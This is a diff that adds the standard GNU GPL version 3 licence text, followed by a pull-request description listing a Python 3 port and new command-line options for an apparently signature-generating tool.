+  An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License.  If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+  1. Source Code.
+
+  The "source code" for a work means the preferred form of the work
+for making modifications to it.  "Object code" means any non-source
+form of a work.
+
+  A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+  The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form.  A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+  The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities.  However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work.  For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+  The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+  The Corresponding Source for a work in source code form is that
+same work.
+
+  2. Basic Permissions.
+
+  All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met.  This License explicitly affirms your unlimited
+permission to run the unmodified Program.  The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work.  This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+  You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force.  You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright.  Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+  Conveying under any other circumstances is permitted solely under
+the conditions stated below.  Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+  No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+  When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+  4. Conveying Verbatim Copies.
+
+  You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+  You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+  5. Conveying Modified Source Versions.
+
+  You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+    a) The work must carry prominent notices stating that you modified
+    it, and giving a relevant date.
+
+    b) The work must carry prominent notices stating that it is
+    released under this License and any conditions added under section
+    7.  This requirement modifies the requirement in section 4 to
+    "keep intact all notices".
+
+    c) You must license the entire work, as a whole, under this
+    License to anyone who comes into possession of a copy.  This
+    License will therefore apply, along with any applicable section 7
+    additional terms, to the whole of the work, and all its parts,
+    regardless of how they are packaged.  This License gives no
+    permission to license the work in any other way, but it does not
+    invalidate such permission if you have separately received it.
+
+    d) If the work has interactive user interfaces, each must display
+    Appropriate Legal Notices; however, if the Program has interactive
+    interfaces that do not display Appropriate Legal Notices, your
+    work need not make them do so.
+
+  A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit.  Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+  6. Conveying Non-Source Forms.
+
+  You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+    a) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by the
+    Corresponding Source fixed on a durable physical medium
+    customarily used for software interchange.
+
+    b) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by a
+    written offer, valid for at least three years and valid for as
+    long as you offer spare parts or customer support for that product
+    model, to give anyone who possesses the object code either (1) a
+    copy of the Corresponding Source for all the software in the
+    product that is covered by this License, on a durable physical
+    medium customarily used for software interchange, for a price no
+    more than your reasonable cost of physically performing this
+    conveying of source, or (2) access to copy the
+    Corresponding Source from a network server at no charge.
+
+    c) Convey individual copies of the object code with a copy of the
+    written offer to provide the Corresponding Source.  This
+    alternative is allowed only occasionally and noncommercially, and
+    only if you received the object code with such an offer, in accord
+    with subsection 6b.
+
+    d) Convey the object code by offering access from a designated
+    place (gratis or for a charge), and offer equivalent access to the
+    Corresponding Source in the same way through the same place at no
+    further charge.  You need not require recipients to copy the
+    Corresponding Source along with the object code.  If the place to
+    copy the object code is a network server, the Corresponding Source
+    may be on a different server (operated by you or a third party)
+    that supports equivalent copying facilities, provided you maintain
+    clear directions next to the object code saying where to find the
+    Corresponding Source.  Regardless of what server hosts the
+    Corresponding Source, you remain obligated to ensure that it is
+    available for as long as needed to satisfy these requirements.
+
+    e) Convey the object code using peer-to-peer transmission, provided
+    you inform other peers where the object code and Corresponding
+    Source of the work are being offered to the general public at no
+    charge under subsection 6d.
+
+  A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+  A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling.  In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage.  For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product.  A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+  "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source.  The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+  If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information.  But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+  The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed.  Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+  Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+  7. Additional Terms.
+
+  "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law.  If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+  When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it.  (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.)  You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+  Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+    a) Disclaiming warranty or limiting liability differently from the
+    terms of sections 15 and 16 of this License; or
+
+    b) Requiring preservation of specified reasonable legal notices or
+    author attributions in that material or in the Appropriate Legal
+    Notices displayed by works containing it; or
+
+    c) Prohibiting misrepresentation of the origin of that material, or
+    requiring that modified versions of such material be marked in
+    reasonable ways as different from the original version; or
+
+    d) Limiting the use for publicity purposes of names of licensors or
+    authors of the material; or
+
+    e) Declining to grant rights under trademark law for use of some
+    trade names, trademarks, or service marks; or
+
+    f) Requiring indemnification of licensors and authors of that
+    material by anyone who conveys the material (or modified versions of
+    it) with contractual assumptions of liability to the recipient, for
+    any liability that these contractual assumptions directly impose on
+    those licensors and authors.
+
+  All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10.  If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term.  If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+  If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+  Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+  8. Termination.
+
+  You may not propagate or modify a covered work except as expressly
+provided under this License.  Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+  However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+  Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+  Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License.  If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+  9. Acceptance Not Required for Having Copies.
+
+  You are not required to accept this License in order to receive or
+run a copy of the Program.  Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance.  However,
+nothing other than this License grants you permission to propagate or
+modify any covered work.  These actions infringe copyright if you do
+not accept this License.  Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+  10. Automatic Licensing of Downstream Recipients.
+
+  Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License.  You are not responsible
+for enforcing compliance by third parties with this License.
+
+  An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations.  If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+  You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License.  For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+  11. Patents.
+
+  A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based.  The
+work thus licensed is called the contributor's "contributor version".
+
+  A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version.  For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+  Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+  In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement).  To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+  If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients.  "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+  If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+  A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License.  You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+  Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+  12. No Surrender of Others' Freedom.
+
+  If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all.  For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+  13. Use with the GNU Affero General Public License.
+
+  Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work.  The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
+
+  14. Revised Versions of this License.
+
+  The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+  Each version is given a distinguishing version number.  If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation.  If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+  If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+  15. Disclaimer of Warranty.
+
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. Limitation of Liability.
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+    <program>  Copyright (C) <year>  <name of author>
+    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+<https://www.gnu.org/licenses/>.
+
+  The GNU General Public License does not permit incorporating your program
+into proprietary programs.  If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.  But first, please read
+<https://www.gnu.org/licenses/why-not-lgpl.html>.


### PR DESCRIPTION
  - Ported to Python 3
  - Removed strings in favor of byte objects
  - Added support for output formats
  - Added support for modulus and public exponent command line parameters. The modulus can be specified instead of the key size
  - Dynamic precision adjustment for larger numbers
  - The program exits with an appropriate message if it cannot generate a signature, rather than spinning in an endless loop
  - The option to specify the number of FF's
  - The "quiet" option
  - All error messages are printed to stderr
  - Appropriate exit codes returned
  - Added module docstrings
  - Proper "import" declarations that list only classes/functions which are actually imported